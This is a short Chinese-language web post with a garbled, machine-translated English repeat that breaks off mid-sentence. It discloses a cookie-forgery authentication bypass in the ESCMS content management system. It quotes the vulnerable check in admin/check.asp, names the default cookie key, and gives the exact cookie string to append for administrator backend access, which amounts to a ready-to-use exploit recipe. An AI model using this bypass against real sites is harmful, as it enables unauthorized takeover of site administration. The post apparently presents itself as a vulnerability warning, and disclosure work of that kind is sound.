ESCMS cookies欺骗漏洞

% if Request.cookiesCookiesKey"ESadmin"="" then ''注意这里哦,他是通过COOKIE验证ESadmin是否为空,我们可以伪造一个值,叫他不为空 ''CookiesKey在inc/ESCMSConfig.asp文件中,默认为ESCMS$SP2 Call ErrShow Response.End End if ...... % 首先我们打开http://sitedir.com.cn/admin/esindex.html 然后在COOKIE结尾加上 ; ESCMS$SP2=ESadmin=st0p; 修改,然后刷新 进后台了嘎...

ESCMS vulnerability website system 0day-vulnerability warning-the black bar safety net

Version:ESCMS V1. 0 SP1 Build 1 1 2 5 Background login authentication is through the admin/check. asp achieved,look at the code % if Request. cookiesCookiesKey"ESadmin"="" then 'Note that here Oh,he is by COOKIE validation ESadmin is empty,we can forge a value,called he is not empty 'CookiesKey i...